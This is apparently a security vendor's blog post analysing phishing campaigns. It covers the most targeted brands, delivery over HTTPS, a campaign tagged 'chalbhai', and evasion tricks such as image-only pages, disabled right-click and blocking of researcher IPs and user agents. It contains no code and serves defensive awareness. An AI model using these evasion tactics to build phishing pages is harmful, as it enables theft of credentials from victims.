Phishing is an attempt to steal personally identifiable information, such as Social Security numbers, credit card details, date of birth, and other sensitive data. Typically, phishing targets a user with an email containing a link to a website that imitates a legitimate website the user might visit. As users have become savvier about their online practices, the developers of phishing sites have upped their game, too, and many of the sites we see are carefully designed to look like the sites they’re imitating, and clever tactics are used to trick potentialvictims.
In this blog, we will share some insights from phishing activities blocked across the Zscaler cloud. We’ll cover the top brands and categories we are seeing targeted by phishing campaigns, recent examples of campaigns, and some of the tactics being used by threat actors to be moresuccessful.
Types of phishingThere are different types of phishing activity,including:
Spear phishing, in which the phishing attempt is targeted against certain organizations or individuals working for specificcompanies.
SMiShing, also known as SMS phishing, which involves a message (SMS communication) that targets victims and entices them to click on URLs hosting phishingwebsites.
Whaling, in which threat actors target high-profile individuals, such as senior executives in a company, most often to gain internal company information that is not publicknowledge.
What brands are beingtargeted?While it might be easier to spoof the sites of lesser-known brands, where differences wouldn’t be so apparent, the actors trying to steal personal information need to impersonate popular sites for maximum return, raising the odds of snaring a victim. Their phishing sites often feature the biggest brands, and they use a variety of tricks to evade detection, which we’ll describe in this report. Some of the most commonly targeted brands we’ve seen in the recent phishing campaigns can be seenbelow:
Fig. 1: Top phishedbrands in the Zscaler Cloud
Microsoft tops the list partly because of Microsoft’s multiple enterprise web properties, such as OneDrive, Office 365, Outlook Web Access, among others, being targeted by the threat actors. Microsoft was followed by Facebook and PayPal in the list. In addition to the known brands, it was interesting to see phishing campaigns targeting Travel Visa portals (Canadian Visa and Australian Visa, for example) included in our top five most targeted brands. The attackers in this case were most likely interested in phishing for sensitive immigration information, such as passport details, date of birth and national identificationnumbers.
The top five most commonly targeted application categories we saw in the recent phishing campaignsinclude:
Communications(41.4%)
Social media(18.3%)
Finance(16.7%)
Travel(12.4%)
Dating (3.4%)
Fig. 2: Top phished sitecategories in the Zscaler Cloud
Delivery of phishingcontentThe majority of the phishing campaigns start with an email or message containing a link to a site hosting the phishing page. If the user clicks on the link, the phishing page is delivered. We have seen an increasing number of phishing attempts being delivered over an encrypted channel (HTTPS) -. We believe this increase is most likely due to the availability of domain validated (DV) SSL certificates. These certificates are easy to obtain from free SSL cert providers like Lets Encrypt as well as commercial Certificate Authorities. Multiple commercial CAs also offer free DV SSL certs with shorter validity periods with the expectation that the client will purchase a paid certificate once those expire. However, these offers provide a safe haven for cybercriminals who often leverage these short-term certs to deliver malicious content and then discardthem.
About 65 percent of all phishing content we’ve seen in thepast three months was over HTTP and theremaining 35 percent was over HTTPS.This represents a 300 percent increase in phishing content being delivered over HTTPS since2016.
A look at recent phishing examples: ChalbhaicampaignWe continue to seea known phishing campaign using the tag chalbhai in its form statements. This campaign has been targeting users with phishing pages that mimic American Express, Microsoft Office, and Adobe,seasonal campaigns like fake IRS and TurboTax webpages during tax season and more recently holiday shopping season pages. A sample of this tag being used on a Wells Fargo phishing page is shownbelow.
Fig. 3: Chalbhai tag shown in thesourcecode
Usage of compromisedsitesBelow is an example of a legitimate site that is compromised and the attacker has hosted multiple phishing sites on the compromised domain. The screenshot shows the open directory found on the compromised webserver.
Fig. 4:Compromised webserver
The two screenshots that follow are phishing pages designed to look like pages of legitimate websites, including a single sign-on page for Abilene Christian University and a Bank of Americapage.
Fig. 5:Faked SSO for Abilene Christian University
Fig. 6:Faked Bank of Americapage
If the user falls for these phishing pages, the credentials are harvested and posted to the attacker controlledlocation.
Evasion and Anti-AnalysisTechniques 1. Use of images instead ofcontentThe phishing websites are usually cloned copiesof the legitimate sites. The difference in the case of Bank of America is that the faked page is almost entirely made up of a single image with a simple credential login form. This helps to evade engines running heuristics on the page sourcecode.
2. Preventing access to pagesourceA simple anti-analysis technique used by scammers is disabling the right click functionality to prevent users from checking the page source. This can be seen in the phishing page below, which is pretending to be an Adobe Onlinedocument.
Fig. 7: Malicious Adobe Online document
3. Filtering based on User IP address, Host Names, and User Agent strings involved in therequestWe’ve also observed malicious actors trying to fingerprint and serve phishing content based on the user’s IP address, host names, and user agents. We can see an example in the snippet below where the attacker is maintaining a list of IP addresses, hostnames and User-Agent strings known to be used by security researchers and analysts while attempting to get the phishing. If any request to the phishing site arrives from one of the known IP addresses or hostnames, or has one of the listed User-Agent strings then the phishing page will not be served. This tactic helps the attacker to keep the phishing page content undetected for a longerduration.
Fig. 8: Banned source IP addresses, hostnames and User-
